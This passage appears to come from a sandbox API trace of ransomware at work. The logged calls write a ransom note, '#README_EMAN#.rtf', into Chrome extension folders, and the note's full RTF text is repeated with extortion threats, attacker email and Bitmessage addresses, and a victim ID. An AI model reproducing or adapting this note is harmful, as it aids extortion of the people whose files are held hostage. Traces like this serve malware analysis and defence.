safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x80'vפ\x12\\<{áUç\x9f¼\x87Kjx°ùld\x143\x0e", lpUsedDefaultChar=0x0) returned 8717 [0289.172] WriteFile (in: hFile=0x2ac, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.173] CloseHandle (hObject=0x2ac) returned 1 [0289.173] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ta\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ta\\#readme_eman#.rtf")) returned 0xffffffff [0289.173] GetLastError () returned 0x2 [0289.173] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ta\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ta\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0289.173] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.173] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely 